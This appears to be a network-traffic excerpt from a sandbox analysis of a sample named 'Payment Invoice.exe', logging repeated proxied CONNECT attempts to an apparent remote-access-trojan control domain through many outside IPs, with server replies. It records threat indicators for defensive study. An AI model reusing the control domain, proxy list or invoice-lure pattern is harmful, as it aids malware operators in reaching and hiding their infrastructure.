                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.589601040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.756896019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777896881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886763096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.997005939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                338192.168.2.45102793.171.220.22988887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.555006027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.959202051 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                339192.168.2.451042178.33.163.15619517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.557895899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.214200020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.276981115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.183307886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                340192.168.2.45105291.107.180.250807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.559024096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.229880095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.510560036 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                341192.168.2.449984144.24.122.46807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.562875986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.942035913 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                342192.168.2.451038193.239.56.8480817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.564774036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                343192.168.2.451094130.162.213.17531287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.568908930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.176024914 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                344192.168.2.45105785.214.107.177807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.572555065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.236562014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.277100086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.356437922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.277095079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183886051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.078851938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.886254072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:54.276746035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                345192.168.2.451101121.128.194.154807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.574245930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.875576019 CET340INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.2
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                346192.168.2.45103791.202.230.21980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.583471060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                347192.168.2.451166104.19.247.62807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.584096909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.738285065 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                348192.168.2.45103968.183.180.22231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.620260954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.339165926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.370544910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.159813881 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                349192.168.2.451134174.64.199.7941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.621186972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                350192.168.2.451165162.214.225.223549177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.621453047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.104762077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.683293104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.870135069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.089485884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.385296106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.589777946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.978601933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.776851892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                351192.168.2.451097212.31.100.13841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.621507883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                352192.168.2.45012966.228.140.20988997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.621586084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.621409893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.621588945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.714528084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                353192.168.2.45111313.37.59.9931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.622040033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.920840979 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:15 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                354192.168.2.451065138.36.150.1610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.623502970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                355192.168.2.451151184.178.172.25152917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:15.626348019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
